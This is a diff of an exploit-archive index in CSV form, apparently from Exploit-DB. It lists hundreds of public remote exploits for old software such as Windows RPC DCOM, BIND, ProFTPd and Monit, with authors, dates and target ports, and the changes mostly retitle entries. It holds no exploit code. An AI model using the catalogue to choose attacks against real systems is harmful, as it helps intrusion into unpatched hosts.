63,platforms/linux/remote/63.c,"miniSQL (mSQL) 1.3 - Remote GID Root Exploit",2003-07-25,"the itch",linux,remote,1114
|
||||
63,platforms/linux/remote/63.c,"miniSQL (mSQL) 1.3 - GID Remote Code Execution",2003-07-25,"the itch",linux,remote,1114
|
||||
64,platforms/windows/remote/64.c,"Microsoft Windows - 'RPC DCOM' Remote Buffer Overflow",2003-07-25,Flashsky,windows,remote,135
|
||||
66,platforms/windows/remote/66.c,"Microsoft Windows Server 2000/XP - 'RPC DCOM' Remote Exploit (MS03-026)",2003-07-26,"H D Moore",windows,remote,135
|
||||
67,platforms/multiple/remote/67.c,"Apache 1.3.x mod_mylo - Remote Code Execution",2003-07-28,"Carl Livitt",multiple,remote,80
|
||||
|
@ -8724,8 +8728,8 @@ id,file,description,date,author,platform,type,port
|
|||
81,platforms/windows/remote/81.c,"Microsoft Windows 2000 - RSVP Server Authority Hijacking (PoC)",2003-08-15,"ste jones",windows,remote,0
|
||||
83,platforms/windows/remote/83.html,"Microsoft Internet Explorer - Object Data Remote Exploit (MS03-032)",2003-08-21,malware,windows,remote,0
|
||||
84,platforms/linux/remote/84.c,"Gopherd 3.0.5 - FTP Gateway Remote Overflow",2003-08-22,vade79,linux,remote,70
|
||||
86,platforms/multiple/remote/86.c,"Real Server 7/8/9 (Windows / Linux) - Remote Root Exploit",2003-08-25,"Johnny Cyberpunk",multiple,remote,554
|
||||
88,platforms/linux/remote/88.c,"GtkFtpd 1.0.4 - Remote Root Buffer Overflow",2003-08-28,vade79,linux,remote,21
|
||||
86,platforms/multiple/remote/86.c,"Real Server 7/8/9 (Windows / Linux) - Remote Code Execution",2003-08-25,"Johnny Cyberpunk",multiple,remote,554
|
||||
88,platforms/linux/remote/88.c,"GtkFtpd 1.0.4 - Buffer Overflow",2003-08-28,vade79,linux,remote,21
|
||||
89,platforms/linux/remote/89.c,"Linux pam_lib_smb < 1.1.6 - /bin/login Remote Exploit",2003-08-29,vertex,linux,remote,23
|
||||
90,platforms/windows/remote/90.c,"eMule/xMule/LMule - OP_SERVERMESSAGE Format String",2003-09-01,"Rémi Denis-Courmont",windows,remote,4661
|
||||
92,platforms/windows/remote/92.c,"Microsoft WordPerfect Document Converter - Exploit (MS03-036)",2003-09-06,valgasu,windows,remote,0
|
||||
|
@ -8735,13 +8739,13 @@ id,file,description,date,author,platform,type,port
|
|||
98,platforms/linux/remote/98.c,"MySQL 3.23.x/4.0.x - Remote Exploit",2003-09-14,bkbll,linux,remote,3306
|
||||
99,platforms/linux/remote/99.c,"Pine 4.56 - Remote Buffer Overflow",2003-09-16,sorbo,linux,remote,0
|
||||
100,platforms/windows/remote/100.c,"Microsoft Windows - 'RPC DCOM' Long Filename Overflow (MS03-026)",2003-09-16,ey4s,windows,remote,135
|
||||
101,platforms/solaris/remote/101.pl,"Solaris Sadmind - Default Configuration Remote Root Exploit",2003-09-19,"H D Moore",solaris,remote,111
|
||||
102,platforms/linux/remote/102.c,"Knox Arkeia Pro 5.1.12 - Backup Remote Root Exploit",2003-09-20,anonymous,linux,remote,617
|
||||
101,platforms/solaris/remote/101.pl,"Solaris Sadmind - Default Configuration Remote Code Execution",2003-09-19,"H D Moore",solaris,remote,111
|
||||
102,platforms/linux/remote/102.c,"Knox Arkeia Pro 5.1.12 - Backup Remote Code Execution",2003-09-20,anonymous,linux,remote,617
|
||||
103,platforms/windows/remote/103.c,"Microsoft Windows - 'RPC DCOM2' Remote Exploit (MS03-039)",2003-09-20,Flashsky,windows,remote,135
|
||||
105,platforms/bsd/remote/105.pl,"GNU CFEngine 2.-2.0.3 - Remote Stack Overflow",2003-09-27,kokanin,bsd,remote,5308
|
||||
107,platforms/linux/remote/107.c,"ProFTPd 1.2.9rc2 - ASCII File Remote Root Exploit",2003-10-04,bkbll,linux,remote,21
|
||||
107,platforms/linux/remote/107.c,"ProFTPd 1.2.9rc2 - ASCII File Remote Code Execution",2003-10-04,bkbll,linux,remote,21
|
||||
109,platforms/windows/remote/109.c,"Microsoft Windows - 'RPC2' Universal Exploit / Denial of Service (RPC3) (MS03-039)",2003-10-09,anonymous,windows,remote,135
|
||||
110,platforms/linux/remote/110.c,"ProFTPd 1.2.7 < 1.2.9rc2 - Remote Root / Brute Force Exploit",2003-10-13,Haggis,linux,remote,21
|
||||
110,platforms/linux/remote/110.c,"ProFTPd 1.2.7 < 1.2.9rc2 - Remote Code Execution / Brute Force",2003-10-13,Haggis,linux,remote,21
|
||||
112,platforms/windows/remote/112.c,"mIRC 6.1 - 'IRC' Protocol Remote Buffer Overflow",2003-10-21,blasty,windows,remote,0
|
||||
116,platforms/windows/remote/116.c,"NIPrint LPD-LPR Print Server 4.10 - Remote Exploit",2003-11-04,xCrZx,windows,remote,515
|
||||
117,platforms/windows/remote/117.c,"Microsoft Windows 2000/XP - RPC Remote (Non Exec Memory) Exploit",2003-11-07,ins1der,windows,remote,135
|
||||
|
@ -8756,7 +8760,7 @@ id,file,description,date,author,platform,type,port
|
|||
133,platforms/windows/remote/133.pl,"Eznet 3.5.0 - Remote Stack Overflow / Denial of Service",2003-12-15,"Peter Winter-Smith",windows,remote,80
|
||||
135,platforms/windows/remote/135.c,"Microsoft Windows Messenger Service - Remote Exploit FR (MS03-043)",2003-12-16,MrNice,windows,remote,135
|
||||
136,platforms/windows/remote/136.pl,"Eznet 3.5.0 - Remote Stack Overflow Universal Exploit",2003-12-18,kralor,windows,remote,80
|
||||
139,platforms/linux/remote/139.c,"Cyrus IMSPD 1.7 - abook_dbname Remote Root Exploit",2003-12-27,SpikE,linux,remote,406
|
||||
139,platforms/linux/remote/139.c,"Cyrus IMSPD 1.7 - 'abook_dbname' Remote Code Execution",2003-12-27,SpikE,linux,remote,406
|
||||
143,platforms/linux/remote/143.c,"lftp 2.6.9 - Remote Stack based Overflow",2004-01-14,Li0n7,linux,remote,0
|
||||
149,platforms/windows/remote/149.c,"RhinoSoft Serv-U FTPd Server 3.x/4.x - 'SITE CHMOD' Command Remote Exploit",2004-01-27,lion,windows,remote,21
|
||||
151,platforms/windows/remote/151.txt,"Microsoft Internet Explorer - URL Injection in History List (MS04-004)",2004-02-04,"Andreas Sandblad",windows,remote,0
|
||||
|
@ -8769,12 +8773,12 @@ id,file,description,date,author,platform,type,port
|
|||
164,platforms/windows/remote/164.c,"Foxmail 5.0 - 'PunyLib.dll' Remote Stack Overflow",2004-03-23,xfocus,windows,remote,0
|
||||
165,platforms/windows/remote/165.c,"Ipswitch WS_FTP Server 4.0.2 - ALLO Remote Buffer Overflow",2004-03-23,"Hugh Mann",windows,remote,21
|
||||
166,platforms/windows/remote/166.pl,"eSignal 7.6 - STREAMQUOTE Remote Buffer Overflow",2004-03-26,VizibleSoft,windows,remote,80
|
||||
167,platforms/linux/remote/167.c,"Ethereal 0.10.0 < 0.10.2 - IGAP Overflow Remote Root Exploit",2004-03-28,"Abhisek Datta",linux,remote,0
|
||||
167,platforms/linux/remote/167.c,"Ethereal 0.10.0 < 0.10.2 - IGAP Overflow",2004-03-28,"Abhisek Datta",linux,remote,0
|
||||
168,platforms/windows/remote/168.c,"RealSecure / Blackice - 'iss_pam1.dll' Remote Overflow",2004-03-28,Sam,windows,remote,0
|
||||
169,platforms/hardware/remote/169.pl,"Multiple Cisco Products - Cisco Global Exploiter Tool",2004-03-28,blackangels,hardware,remote,0
|
||||
171,platforms/linux/remote/171.c,"tcpdump - ISAKMP Identification payload Integer Overflow",2004-04-05,Rapid7,linux,remote,0
|
||||
173,platforms/linux/remote/173.pl,"Monit 4.1 - Remote Root Buffer Overflow",2004-04-09,gsicht,linux,remote,2812
|
||||
174,platforms/linux/remote/174.c,"Monit 4.2 - Remote Root Buffer Overflow",2004-04-12,"Abhisek Datta",linux,remote,2812
|
||||
173,platforms/linux/remote/173.pl,"Monit 4.1 - Buffer Overflow",2004-04-09,gsicht,linux,remote,2812
|
||||
174,platforms/linux/remote/174.c,"Monit 4.2 - Buffer Overflow",2004-04-12,"Abhisek Datta",linux,remote,2812
|
||||
175,platforms/windows/remote/175.pl,"eMule 0.42d - IRC Remote Buffer Overflow",2004-04-12,kingcope,windows,remote,0
|
||||
181,platforms/linux/remote/181.c,"Half Life - (rcon) Remote Buffer Overflow",2000-11-16,"Sao Paulo",linux,remote,27015
|
||||
189,platforms/windows/remote/189.c,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (6)",2000-11-18,incubus,windows,remote,80
|
||||
|
@ -8783,13 +8787,13 @@ id,file,description,date,author,platform,type,port
|
|||
192,platforms/windows/remote/192.pl,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (8)",2000-11-18,"Roelof Temmingh",windows,remote,80
|
||||
201,platforms/multiple/remote/201.c,"WU-FTPD 2.6.0 - Remote Command Execution",2000-11-21,venglin,multiple,remote,21
|
||||
204,platforms/linux/remote/204.c,"BFTPd - vsprintf() Format Strings Exploit",2000-11-29,DiGiT,linux,remote,21
|
||||
208,platforms/linux/remote/208.c,"INND/NNRP < 1.6.x - Remote Root Overflow",2000-11-30,"Babcia Padlina",linux,remote,119
|
||||
208,platforms/linux/remote/208.c,"INND/NNRP < 1.6.x - Overflow Exploit",2000-11-30,"Babcia Padlina",linux,remote,119
|
||||
211,platforms/cgi/remote/211.c,"PHF (Linux/x86) - Buffer Overflow",2000-12-01,proton,cgi,remote,0
|
||||
213,platforms/solaris/remote/213.c,"Solaris sadmind - Remote Buffer Overflow",2000-12-01,Optyx,solaris,remote,111
|
||||
220,platforms/linux/remote/220.c,"PHP 3.0.16/4.0.2 - Remote Format Overflow",2000-12-06,Gneisenau,linux,remote,80
|
||||
225,platforms/linux/remote/225.c,"BFTPd 1.0.12 - Remote Exploit",2000-12-11,korty,linux,remote,21
|
||||
226,platforms/linux/remote/226.c,"LPRng 3.6.22/23/24 - Remote Command Execution",2000-12-11,sk8,linux,remote,515
|
||||
227,platforms/linux/remote/227.c,"LPRng (RedHat 7.0) - lpd Remote Root Format String",2000-12-11,DiGiT,linux,remote,515
|
||||
227,platforms/linux/remote/227.c,"LPRng (RedHat 7.0) - 'lpd' Format String",2000-12-11,DiGiT,linux,remote,515
|
||||
228,platforms/bsd/remote/228.c,"Oops! 1.4.6 - (one russi4n proxy-server) Heap Buffer Overflow",2000-12-15,diman,bsd,remote,3128
|
||||
230,platforms/linux/remote/230.c,"LPRng 3.6.24-1 - Remote Command Execution",2000-12-15,VeNoMouS,linux,remote,515
|
||||
232,platforms/windows/remote/232.c,"Check Point VPN-1/FireWall-1 4.1 SP2 - Blocked Port Bypass Exploit",2000-12-19,Unknown,windows,remote,0
|
||||
|
@ -8801,20 +8805,20 @@ id,file,description,date,author,platform,type,port
|
|||
263,platforms/solaris/remote/263.pl,"Netscape Enterprise Server 4.0/sparc/SunOS 5.7 - Remote Exploit",2001-01-27,Fyodor,solaris,remote,80
|
||||
266,platforms/windows/remote/266.c,"Microsoft Windows 2000 SP1/SP2 - isapi .printer Extension Overflow (1)",2001-05-07,"Ryan Permeh",windows,remote,80
|
||||
268,platforms/windows/remote/268.c,"Microsoft Windows 2000 SP1/SP2 - isapi .printer Extension Overflow (2)",2001-05-08,"dark spyrit",windows,remote,80
|
||||
269,platforms/linux/remote/269.c,"BeroFTPD 1.3.4(1) (Linux/x86) - Remote Root Exploit",2001-05-08,qitest1,linux,remote,21
|
||||
269,platforms/linux/remote/269.c,"BeroFTPD 1.3.4(1) (Linux/x86) - Remote Code Execution",2001-05-08,qitest1,linux,remote,21
|
||||
275,platforms/windows/remote/275.c,"Microsoft IIS 5.0 - SSL Remote Buffer Overflow (MS04-011)",2004-04-21,"Johnny Cyberpunk",windows,remote,443
|
||||
277,platforms/linux/remote/277.c,"BIND 8.2.x - (TSIG) Remote Root Stack Overflow (1)",2001-03-01,Gneisenau,linux,remote,53
|
||||
279,platforms/linux/remote/279.c,"BIND 8.2.x - (TSIG) Remote Root Stack Overflow (2)",2001-03-01,LSD-PLaNET,linux,remote,53
|
||||
280,platforms/solaris/remote/280.c,"BIND 8.2.x - (TSIG) Remote Root Stack Overflow (3)",2001-03-01,LSD-PLaNET,solaris,remote,53
|
||||
282,platforms/linux/remote/282.c,"BIND 8.2.x - (TSIG) Remote Root Stack Overflow (4)",2001-03-02,multiple,linux,remote,53
|
||||
277,platforms/linux/remote/277.c,"BIND 8.2.x - (TSIG) Stack Overflow (1)",2001-03-01,Gneisenau,linux,remote,53
|
||||
279,platforms/linux/remote/279.c,"BIND 8.2.x - (TSIG) Stack Overflow (2)",2001-03-01,LSD-PLaNET,linux,remote,53
|
||||
280,platforms/solaris/remote/280.c,"BIND 8.2.x - (TSIG) Stack Overflow (3)",2001-03-01,LSD-PLaNET,solaris,remote,53
|
||||
282,platforms/linux/remote/282.c,"BIND 8.2.x - (TSIG) Stack Overflow (4)",2001-03-02,multiple,linux,remote,53
|
||||
284,platforms/linux/remote/284.c,"IMAP4rev1 12.261/12.264/2000.284 - (lsub) Remote Exploit",2001-03-03,SkyLaZarT,linux,remote,143
|
||||
291,platforms/linux/remote/291.c,"TCP Connection Reset - Remote Exploit",2004-04-23,"Paul A. Watson",linux,remote,0
|
||||
293,platforms/windows/remote/293.c,"Microsoft Windows - 'Lsasrv.dll' RPC Remote Buffer Overflow (MS04-011)",2004-04-24,sbaa,windows,remote,445
|
||||
294,platforms/hardware/remote/294.pl,"HP Web JetAdmin 6.5 - (connectedNodes.ovpl) Remote Root Exploit",2004-04-28,FX,hardware,remote,8000
|
||||
294,platforms/hardware/remote/294.pl,"HP Web JetAdmin 6.5 - 'connectedNodes.ovpl' Remote Code Execution",2004-04-28,FX,hardware,remote,8000
|
||||
295,platforms/windows/remote/295.c,"Microsoft Windows Server 2000/XP - 'Lsasrv.dll' Remote Universal Exploit (MS04-011)",2004-04-29,houseofdabus,windows,remote,445
|
||||
296,platforms/linux/remote/296.c,"XChat 1.8.0/2.0.8 socks5 - Remote Buffer Overflow",2004-05-05,vade79,linux,remote,0
|
||||
297,platforms/windows/remote/297.c,"Sasser Worm ftpd - Remote Buffer Overflow (port 5554)",2004-05-16,mandragore,windows,remote,5554
|
||||
300,platforms/multiple/remote/300.c,"CVS (Linux/FreeBSD) - Remote Entry Line Heap Overflow Root Exploit",2004-06-25,Ac1dB1tCh3z,multiple,remote,2401
|
||||
300,platforms/multiple/remote/300.c,"CVS (Linux/FreeBSD) - Remote Entry Line Heap Overflow",2004-06-25,Ac1dB1tCh3z,multiple,remote,2401
|
||||
301,platforms/solaris/remote/301.c,"CVS - Remote Entry Line Root Heap Overflow",2004-06-25,anonymous,solaris,remote,2401
|
||||
303,platforms/linux/remote/303.pl,"Borland Interbase 7.x - Remote Exploit",2004-06-25,"Aviram Jenik",linux,remote,3050
|
||||
304,platforms/linux/remote/304.c,"Subversion 1.0.2 - svn_time_from_cstring() Remote Exploit",2004-06-25,"Gyan Chawdhary",linux,remote,3690
|
||||
|
@ -8826,11 +8830,11 @@ id,file,description,date,author,platform,type,port
|
|||
315,platforms/windows/remote/315.txt,"Microsoft Outlook Express - JavaScript Execution",2004-07-13,anonymous,windows,remote,0
|
||||
316,platforms/windows/remote/316.txt,"Microsoft Internet Explorer - Remote Wscript.Shell Exploit",2004-07-13,"Ferruh Mavituna",windows,remote,0
|
||||
340,platforms/linux/remote/340.c,"Linux imapd - Remote Overflow File Retrieve Exploit",1997-06-24,p1,linux,remote,143
|
||||
346,platforms/linux/remote/346.c,"Solaris /bin/login (SPARC/x86) - Remote Root Exploit",2001-12-20,Teso,linux,remote,23
|
||||
346,platforms/linux/remote/346.c,"Solaris /bin/login (SPARC/x86) - Remote Code Execution",2001-12-20,Teso,linux,remote,23
|
||||
347,platforms/linux/remote/347.c,"Squid 2.4.1 - Remote Buffer Overflow",2002-05-14,Teso,linux,remote,0
|
||||
348,platforms/linux/remote/348.c,"WU-FTPD 2.6.1 - Remote Command Execution",2002-05-14,Teso,linux,remote,21
|
||||
349,platforms/multiple/remote/349.txt,"SSH (x2) - Remote Command Execution",2002-05-01,Teso,multiple,remote,22
|
||||
359,platforms/linux/remote/359.c,"Drcat 0.5.0-beta - (drcatd) Remote Root Exploit",2004-07-22,Taif,linux,remote,3535
|
||||
359,platforms/linux/remote/359.c,"Drcat 0.5.0-beta - 'drcatd' Remote Code Execution",2004-07-22,Taif,linux,remote,3535
|
||||
361,platforms/windows/remote/361.txt,"Flash FTP Server - Directory Traversal",2004-07-22,CoolICE,windows,remote,0
|
||||
364,platforms/linux/remote/364.pl,"Samba 3.0.4 SWAT - Authorisation Buffer Overflow",2004-07-22,"Noam Rathaus",linux,remote,901
|
||||
372,platforms/linux/remote/372.c,"OpenFTPd 0.30.2 - Remote Exploit",2004-08-03,Andi,linux,remote,21
|
||||
|
@ -8840,10 +8844,10 @@ id,file,description,date,author,platform,type,port
|
|||
380,platforms/linux/remote/380.c,"Pavuk Digest - Authentication Buffer Overflow Remote Exploit",2004-08-08,infamous41md,linux,remote,80
|
||||
382,platforms/linux/remote/382.c,"Melange Chat Server 1.10 - Remote Buffer Overflow",2002-12-24,innerphobia,linux,remote,0
|
||||
386,platforms/linux/remote/386.c,"xine 0.99.2 - Remote Stack Overflow",2004-08-09,c0ntex,linux,remote,80
|
||||
387,platforms/linux/remote/387.c,"Dropbear SSH 0.34 - Remote Root Exploit",2004-08-09,livenn,linux,remote,22
|
||||
387,platforms/linux/remote/387.c,"Dropbear SSH 0.34 - Remote Code Execution",2004-08-09,livenn,linux,remote,22
|
||||
389,platforms/linux/remote/389.c,"LibPNG Graphics Library - Remote Buffer Overflow",2004-08-11,infamous41md,linux,remote,0
|
||||
390,platforms/linux/remote/390.c,"GV PostScript Viewer - Remote Buffer Overflow (1)",2004-08-13,infamous41md,linux,remote,0
|
||||
391,platforms/osx/remote/391.pl,"Apple Mac OSX 10.3.3 - AppleFileServer Remote Root Overflow",2004-08-13,"Dino Dai Zovi",osx,remote,548
|
||||
391,platforms/osx/remote/391.pl,"Apple Mac OSX 10.3.3 - AppleFileServer Overflow Remote Code Execution",2004-08-13,"Dino Dai Zovi",osx,remote,548
|
||||
392,platforms/linux/remote/392.c,"Remote CVS 1.11.15 - (error_prog_name) Remote Exploit",2004-08-13,"Gyan Chawdhary",linux,remote,2401
|
||||
397,platforms/linux/remote/397.c,"WU-IMAP 2000.287(1-2) - Remote Exploit",2002-06-25,Teso,linux,remote,143
|
||||
398,platforms/linux/remote/398.c,"rsync 2.5.1 - Remote Exploit (1)",2002-01-01,Teso,linux,remote,873
|
||||
|
@ -8876,7 +8880,7 @@ id,file,description,date,author,platform,type,port
|
|||
572,platforms/windows/remote/572.pl,"Eudora 6.2.0.7 - Attachment Spoofer Exploit",2004-10-11,"Paul Szabo",windows,remote,0
|
||||
573,platforms/windows/remote/573.c,"Icecast 2.0.1 (Win32) - Remote Code Execution (2)",2004-10-12,K-C0d3r,windows,remote,8000
|
||||
577,platforms/windows/remote/577.c,"YahooPOPs 1.6 - SMTP Port Buffer Overflow",2004-10-15,class101,windows,remote,25
|
||||
580,platforms/linux/remote/580.c,"Monit 4.2 - Basic Authentication Remote Root Exploit",2004-10-17,rtk,linux,remote,2812
|
||||
580,platforms/linux/remote/580.c,"Monit 4.2 - Basic Authentication Remote Code Execution",2004-10-17,rtk,linux,remote,2812
|
||||
581,platforms/linux/remote/581.c,"ProFTPd 1.2.10 - Remote Users Enumeration Exploit",2004-10-17,"Leon Juranic",linux,remote,0
|
||||
582,platforms/windows/remote/582.c,"YahooPOPs 1.6 - SMTP Remote Buffer Overflow",2004-10-18,"Diabolic Crab",windows,remote,25
|
||||
583,platforms/windows/remote/583.pl,"SLX Server 6.1 - Arbitrary File Creation (PoC)",2004-10-18,"Carl Livitt",windows,remote,0
|
||||
|
@ -8886,13 +8890,13 @@ id,file,description,date,author,platform,type,port
|
|||
590,platforms/windows/remote/590.c,"ShixxNOTE 6.net - Remote Buffer Overflow",2004-10-22,class101,windows,remote,2000
|
||||
592,platforms/windows/remote/592.py,"Ability Server 2.34 - (APPE) Remote Buffer Overflow",2004-10-23,KaGra,windows,remote,21
|
||||
598,platforms/windows/remote/598.py,"TABS MailCarrier 2.51 - SMTP EHLO / HELO Buffer Overflow",2004-10-26,muts,windows,remote,25
|
||||
608,platforms/linux/remote/608.c,"WvTFTPd 0.9 - Remote Root Heap Overflow",2004-10-28,infamous41md,linux,remote,69
|
||||
608,platforms/linux/remote/608.c,"WvTFTPd 0.9 - Heap Overflow",2004-10-28,infamous41md,linux,remote,69
|
||||
609,platforms/linux/remote/609.txt,"zgv 5.5 - Multiple Arbitrary Code Execution (PoC)",2004-10-28,infamous41md,linux,remote,0
|
||||
612,platforms/windows/remote/612.html,"Microsoft Internet Explorer 6 - (IFRAME Tag) Buffer Overflow",2004-11-02,Skylined,windows,remote,0
|
||||
616,platforms/windows/remote/616.c,"MiniShare 1.4.1 - Remote Buffer Overflow (1)",2004-11-07,class101,windows,remote,80
|
||||
618,platforms/windows/remote/618.c,"Ability Server 2.34 - FTP STOR Buffer Overflow (Unix Exploit)",2004-11-07,NoPh0BiA,windows,remote,21
|
||||
619,platforms/windows/remote/619.c,"CCProxy Log - Remote Stack Overflow",2004-11-09,Ruder,windows,remote,808
|
||||
620,platforms/linux/remote/620.c,"Qwik SMTP 0.3 - Remote Root Format String",2004-11-09,"Carlos Barros",linux,remote,25
|
||||
620,platforms/linux/remote/620.c,"Qwik SMTP 0.3 - Format String",2004-11-09,"Carlos Barros",linux,remote,25
|
||||
621,platforms/windows/remote/621.c,"CCProxy 6.2 - (ping) Remote Buffer Overflow",2004-11-10,KaGra,windows,remote,23
|
||||
623,platforms/windows/remote/623.c,"SlimFTPd 3.15 - Remote Buffer Overflow",2004-11-10,class101,windows,remote,21
|
||||
627,platforms/windows/remote/627.pl,"IPSwitch IMail 8.13 - (DELETE) Remote Stack Overflow",2004-11-12,Zatlander,windows,remote,143
|
||||
|
@ -8911,7 +8915,7 @@ id,file,description,date,author,platform,type,port
|
|||
668,platforms/windows/remote/668.c,"Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow (1)",2004-11-30,JohnH,windows,remote,143
|
||||
670,platforms/windows/remote/670.c,"Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow (2)",2004-12-01,JohnH,windows,remote,143
|
||||
675,platforms/windows/remote/675.txt,"Hosting Controller 0.6.1 Hotfix 1.4 - Directory Browsing",2004-12-05,Mouse,windows,remote,0
|
||||
681,platforms/linux/remote/681.c,"Citadel/UX 6.27 - Remote Root Format String",2004-12-12,CoKi,linux,remote,504
|
||||
681,platforms/linux/remote/681.c,"Citadel/UX 6.27 - Format String",2004-12-12,CoKi,linux,remote,504
|
||||
689,platforms/multiple/remote/689.pl,"wget 1.9 - Directory Traversal",2004-12-15,jjminar,multiple,remote,0
|
||||
693,platforms/windows/remote/693.c,"Ability Server 2.34 - Remote APPE Buffer Overflow",2004-12-16,darkeagle,windows,remote,21
|
||||
705,platforms/multiple/remote/705.pl,"Webmin - Brute Force / Command Execution",2004-12-22,Di42lo,multiple,remote,10000
|
||||
|
@ -8952,7 +8956,7 @@ id,file,description,date,author,platform,type,port
|
|||
825,platforms/windows/remote/825.c,"3Com FTP Server 2.0 - Remote Overflow",2005-02-17,c0d3r,windows,remote,21
|
||||
826,platforms/linux/remote/826.c,"Medal of Honor Spearhead (Linux) - Server Remote Buffer Overflow",2005-02-18,millhouse,linux,remote,12203
|
||||
827,platforms/windows/remote/827.c,"3Com 3CDaemon FTP - Unauthorized 'USER' Remote Buffer Overflow",2005-02-18,class101,windows,remote,21
|
||||
828,platforms/multiple/remote/828.c,"Knox Arkeia Server Backup 5.3.x - Remote Root Exploit",2005-02-18,"John Doe",multiple,remote,617
|
||||
828,platforms/multiple/remote/828.c,"Knox Arkeia Server Backup 5.3.x - Remote Code Execution",2005-02-18,"John Doe",multiple,remote,617
|
||||
829,platforms/hardware/remote/829.c,"Thomson TCW690 - POST Password Validation Exploit",2005-02-19,MurDoK,hardware,remote,80
|
||||
830,platforms/windows/remote/830.c,"SHOUTcast 1.9.4 (Windows) - File Request Format String Remote Exploit",2005-02-19,mandragore,windows,remote,8000
|
||||
831,platforms/linux/remote/831.c,"GNU Cfengine 2.17p1 - RSA Authentication Heap Overflow",2005-02-20,jsk,linux,remote,5803
|
||||
|
@ -8965,8 +8969,8 @@ id,file,description,date,author,platform,type,port
|
|||
878,platforms/linux/remote/878.c,"Ethereal 0.10.9 (Linux) - '3G-A11' Remote Buffer Overflow",2005-03-14,"Diego Giagio",linux,remote,0
|
||||
879,platforms/multiple/remote/879.pl,"LimeWire 4.1.2 < 4.5.6 - Inappropriate GET Request Remote Exploit",2005-03-14,lammat,multiple,remote,0
|
||||
883,platforms/windows/remote/883.c,"GoodTech Telnet Server < 5.0.7 - Remote Buffer Overflow (2)",2005-04-24,cybertronic,windows,remote,2380
|
||||
900,platforms/linux/remote/900.c,"Smail 3.2.0.120 - Remote Root Heap Overflow",2005-03-28,infamous41md,linux,remote,25
|
||||
902,platforms/linux/remote/902.c,"mtftpd 0.0.3 - Remote Root Exploit",2005-03-29,darkeagle,linux,remote,21
|
||||
900,platforms/linux/remote/900.c,"Smail 3.2.0.120 - Heap Overflow",2005-03-28,infamous41md,linux,remote,25
|
||||
902,platforms/linux/remote/902.c,"mtftpd 0.0.3 - Remote Code Execution",2005-03-29,darkeagle,linux,remote,21
|
||||
903,platforms/linux/remote/903.c,"Cyrus imapd 2.2.4 < 2.2.8 - (imapmagicplus) Remote Exploit",2005-03-29,crash-x,linux,remote,143
|
||||
906,platforms/windows/remote/906.c,"BakBone NetVault 6.x/7.x - Remote Heap Buffer Overflow (2)",2005-04-01,class101,windows,remote,20031
|
||||
909,platforms/windows/remote/909.cpp,"Microsoft Windows - 'WINS' Remote Buffer Overflow (MS04-045) (3)",2005-04-12,class101,windows,remote,42
|
||||
|
@ -8991,7 +8995,7 @@ id,file,description,date,author,platform,type,port
|
|||
976,platforms/windows/remote/976.cpp,"Microsoft Windows - WINS Vulnerability and OS/SP Scanner",2005-05-02,class101,windows,remote,0
|
||||
977,platforms/hp-ux/remote/977.c,"HP-UX FTPD 1.1.214.4 - 'REST' Remote Brute Force Exploit",2005-05-03,phased,hp-ux,remote,0
|
||||
979,platforms/windows/remote/979.txt,"Hosting Controller 0.6.1 - Unauthenticated User Registration (1)",2005-05-04,Mouse,windows,remote,0
|
||||
981,platforms/linux/remote/981.c,"dSMTP Mail Server 3.1b - Linux Remote Root Format String",2005-05-05,cybertronic,linux,remote,25
|
||||
981,platforms/linux/remote/981.c,"dSMTP Mail Server 3.1b (Linux) - Format String Exploit",2005-05-05,cybertronic,linux,remote,25
|
||||
986,platforms/windows/remote/986.html,"Mozilla Firefox 1.0.3 - Install Method Arbitrary Code Execution",2005-05-07,"Edward Gagnon",windows,remote,0
|
||||
987,platforms/windows/remote/987.c,"Hosting Controller 0.6.1 - Unauthenticated User Registration (2)",2005-05-07,Silentium,windows,remote,0
|
||||
990,platforms/windows/remote/990.c,"BakBone NetVault 6.x/7.x - Remote Heap Buffer Overflow (1)",2005-05-17,nolimit,windows,remote,20031
|
||||
|
@ -9016,7 +9020,7 @@ id,file,description,date,author,platform,type,port
|
|||
1115,platforms/windows/remote/1115.pl,"Intruder Client 1.00 - Remote Command Execution / Denial of Service",2005-07-21,basher13,windows,remote,0
|
||||
1118,platforms/windows/remote/1118.c,"SlimFTPd 3.16 - Remote Buffer Overflow",2005-07-25,redsand,windows,remote,21
|
||||
1123,platforms/linux/remote/1123.c,"GNU Mailutils imap4d 0.6 - Remote Format String",2005-08-01,CoKi,linux,remote,143
|
||||
1124,platforms/linux/remote/1124.pl,"IPSwitch IMail Server 8.15 - IMAPD Remote Root Exploit",2005-08-01,kingcope,linux,remote,143
|
||||
1124,platforms/linux/remote/1124.pl,"IPSwitch IMail Server 8.15 - IMAPD Remote Code Execution",2005-08-01,kingcope,linux,remote,143
|
||||
1130,platforms/windows/remote/1130.c,"CA BrightStor ARCserve Backup Agent - 'dbasqlr.exe' Remote Exploit",2005-08-03,cybertronic,windows,remote,6070
|
||||
1131,platforms/windows/remote/1131.c,"CA BrightStor ARCserve Backup - 'dsconfig.exe' Buffer Overflow",2005-08-03,cybertronic,windows,remote,41523
|
||||
1132,platforms/windows/remote/1132.c,"CA BrightStor ARCserve Backup - Exploiter Tool",2005-08-03,cybertronic,windows,remote,6070
|
||||
|
@ -9066,7 +9070,7 @@ id,file,description,date,author,platform,type,port
|
|||
1290,platforms/linux/remote/1290.pl,"gpsdrive 2.09 (PPC) - (friendsd2) Remote Format String",2005-11-04,"Kevin Finisterre",linux,remote,0
|
||||
1291,platforms/linux/remote/1291.pl,"gpsdrive 2.09 (x86) - (friendsd2) Remote Format String",2005-11-04,"Kevin Finisterre",linux,remote,0
|
||||
1292,platforms/multiple/remote/1292.pm,"WzdFTPD 0.5.4 - (SITE) Remote Command Execution (Metasploit)",2005-11-04,"David Maciejak",multiple,remote,21
|
||||
1295,platforms/linux/remote/1295.c,"linux-ftpd-ssl 0.17 - (MKD/CWD) Remote Root Exploit",2005-11-05,kingcope,linux,remote,21
|
||||
1295,platforms/linux/remote/1295.c,"linux-ftpd-ssl 0.17 - 'MKD'/'CWD' Remote Code Execution",2005-11-05,kingcope,linux,remote,21
|
||||
1313,platforms/windows/remote/1313.c,"Snort 2.4.2 - Back Orifice Pre-Preprocessor Remote Exploit (3)",2005-11-11,xort,windows,remote,0
|
||||
1314,platforms/linux/remote/1314.rb,"Snort 2.4.2 - Back Orifice Pre-Preprocessor Remote Exploit (4)",2005-11-11,xwings,linux,remote,0
|
||||
